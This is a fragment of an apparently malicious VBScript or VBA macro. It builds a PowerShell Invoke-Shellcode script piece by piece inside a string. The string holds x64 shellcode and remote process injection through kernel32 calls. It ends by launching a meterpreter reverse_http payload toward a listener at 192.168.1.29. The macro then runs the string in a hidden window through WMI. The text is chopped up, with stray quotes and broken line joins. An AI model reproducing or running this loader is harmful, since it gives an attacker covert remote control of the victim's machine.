    jC = jC + "48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0x"
    jC = jC + "c1,"
                                  0x38,0xe0,0"
    jC = jC + "x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0"
    jC = jC + "x75,0xd8,0x58,0x44,"
                             "
    jC = jC + "     0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,"
    jC = jC + "0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,"
             "
    jC = jC + "                     0x01,0xd0,0x41,0x8b,0x04,0x88"
    jC = jC + ",0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a"
    jC = jC + ","
                                  0x41,0x58,0x4"
    jC = jC + "1,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xf"
    jC = jC + "f,0xe0,0x58,0x41,"
                               "
    jC = jC + "   0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0x"
    jC = jC + "ff,0x5d,0x48,0xba,0x01,0x00,0x00,"
               "
    jC = jC + "                   0x00,0x00,0x00,0x00,0x00,0x48,0"
    jC = jC + "x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,"
"
    jC = jC + ""
                                  0x6f,0x87,0xff,"
    jC = jC + "0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,"
    jC = jC + "0xbd,0x9d,0xff,"
                                 "
    jC = jC + " 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80"
    jC = jC + ",0xfb,0xe0,0x75,0x05,0xbb,0x47,"
                 "
    jC = jC + "                 0x13,0x72,0x6f,0x6a,0x00,0x59,0x4"
    jC = jC + "1,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00)"
 "
    jC = jC + "   }"
    if ( $PSBoundParameters['ProcessID'] )
"
    jC = jC + "    {"
        $OpenProcessAddr = Get-ProcAddress "
    jC = jC + "kernel32.dll OpenProcess"
        $OpenProcessDele"
    jC = jC + "gate = Get-DelegateType @([UInt32], [Bool], [UInt3"
    jC = jC + "2]) ([IntPtr])"
        $OpenProcess = [System.Run"
    jC = jC + "time.InteropServices.Marshal]::GetDelegateForFunct"
    jC = jC + "ionPointer($OpenProcessAddr, $OpenProcessDelegate)"
    jC = jC + ""
        $VirtualAllocExAddr = Get-ProcAddress ke"
    jC = jC + "rnel32.dll VirtualAllocEx"
        $VirtualAllocEx"
    jC = jC + "Delegate = Get-DelegateType @([IntPtr], [IntPtr], "
    jC = jC + "[Uint32], [UInt32], [UInt32]) ([IntPtr])"
        "
    jC = jC + "$VirtualAllocEx = [System.Runtime.InteropServices."
    jC = jC + "Marshal]::GetDelegateForFunctionPointer($VirtualAl"
    jC = jC + "locExAddr, $VirtualAllocExDelegate)"
        $Writ"
    jC = jC + "eProcessMemoryAddr = Get-ProcAddress kernel32.dll "
    jC = jC + "WriteProcessMemory"
        $WriteProcessMemoryDel"
    jC = jC + "egate = Get-DelegateType @([IntPtr], [IntPtr], [By"
    jC = jC + "te[]], [UInt32], [UInt32].MakeByRefType()) ([Bool]"
    jC = jC + ")"
        $WriteProcessMemory = [System.Runtime.I"
    jC = jC + "nteropServices.Marshal]::GetDelegateForFunctionPoi"
    jC = jC + "nter($WriteProcessMemoryAddr, $WriteProcessMemoryD"
    jC = jC + "elegate)"
        $CreateRemoteThreadAddr = Get-Pr"
    jC = jC + "ocAddress kernel32.dll CreateRemoteThread"
       "
    jC = jC + " $CreateRemoteThreadDelegate = Get-DelegateType @("
    jC = jC + "[IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], "
    jC = jC + "[UInt32], [IntPtr]) ([IntPtr])"
        $CreateRem"
    jC = jC + "oteThread = [System.Runtime.InteropServices.Marsha"
    jC = jC + "l]::GetDelegateForFunctionPointer($CreateRemoteThr"
    jC = jC + "eadAddr, $CreateRemoteThreadDelegate)"
        $Cl"
    jC = jC + "oseHandleAddr = Get-ProcAddress kernel32.dll Close"
    jC = jC + "Handle"
        $CloseHandleDelegate = Get-Delegat"
    jC = jC + "eType @([IntPtr]) ([Bool])"
        $CloseHandle ="
    jC = jC + " [System.Runtime.InteropServices.Marshal]::GetDele"
    jC = jC + "gateForFunctionPointer($CloseHandleAddr, $CloseHan"
    jC = jC + "dleDelegate)"
        if ( $Force -or $psCmdlet.Sh"
    jC = jC + "ouldContinue( 'Do you wish to carry out your evil "
    jC = jC + "plans?',"
                 "Injecting shellcode in"
    jC = jC + "jecting into $((Get-Process -Id $ProcessId).Proces"
    jC = jC + "sName) ($ProcessId)!" ) )
        {
            "
    jC = jC + "Inject-RemoteShellcode $ProcessId"
        }
    "
    jC = jC + "}"
    Else
    {
        $VirtualAllocAddr = Ge"
    jC = jC + "t-ProcAddress kernel32.dll VirtualAlloc"
        $"
    jC = jC + "VirtualAllocDelegate = Get-DelegateType @([IntPtr]"
    jC = jC + ", [UInt32], [UInt32], [UInt32]) ([IntPtr])"
      "
    jC = jC + "  $VirtualAlloc = [System.Runtime.InteropServices."
    jC = jC + "Marshal]::GetDelegateForFunctionPointer($VirtualAl"
    jC = jC + "locAddr, $VirtualAllocDelegate)"
        $VirtualF"
    jC = jC + "reeAddr = Get-ProcAddress kernel32.dll VirtualFree"
    jC = jC + ""
        $VirtualFreeDelegate = Get-DelegateType "
    jC = jC + "@([IntPtr], [Uint32], [UInt32]) ([Bool])"
        "
    jC = jC + "$VirtualFree = [System.Runtime.InteropServices.Mar"
    jC = jC + "shal]::GetDelegateForFunctionPointer($VirtualFreeA"
    jC = jC + "ddr, $VirtualFreeDelegate)"
        $CreateThreadA"
    jC = jC + "ddr = Get-ProcAddress kernel32.dll CreateThread"
 "
    jC = jC + "       $CreateThreadDelegate = Get-DelegateType @("
    jC = jC + "[IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], "
    jC = jC + "[IntPtr]) ([IntPtr])"
        $CreateThread = [Sys"
    jC = jC + "tem.Runtime.InteropServices.Marshal]::GetDelegateF"
    jC = jC + "orFunctionPointer($CreateThreadAddr, $CreateThread"
    jC = jC + "Delegate)"
        $WaitForSingleObjectAddr = Get-"
    jC = jC + "ProcAddress kernel32.dll WaitForSingleObject"
    "
    jC = jC + "    $WaitForSingleObjectDelegate = Get-DelegateTyp"
    jC = jC + "e @([IntPtr], [Int32]) ([Int])"
        $WaitForSi"
    jC = jC + "ngleObject = [System.Runtime.InteropServices.Marsh"
    jC = jC + "al]::GetDelegateForFunctionPointer($WaitForSingleO"
    jC = jC + "bjectAddr, $WaitForSingleObjectDelegate)"
        "
    jC = jC + "if ( $Force -or $psCmdlet.ShouldContinue( 'Do you "
    jC = jC + "wish to carry out your evil plans?',"
            "
    jC = jC + "     "Injecting shellcode into the running PowerSh"
    jC = jC + "ell process!" ) )
        {
            Inject-L"
    jC = jC + "ocalShellcode"
        }
    }
}
Invoke-Shell"
    jC = jC + "code -Payload windows/meterpreter/reverse_http -Lh"
    jC = jC + "ost 192.168.1.29 -Lport 80 -Force"
    Const HIDDEN_WINDOW = 0
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objProcess.Create jC, Null, objConfig, intProcessID
End Function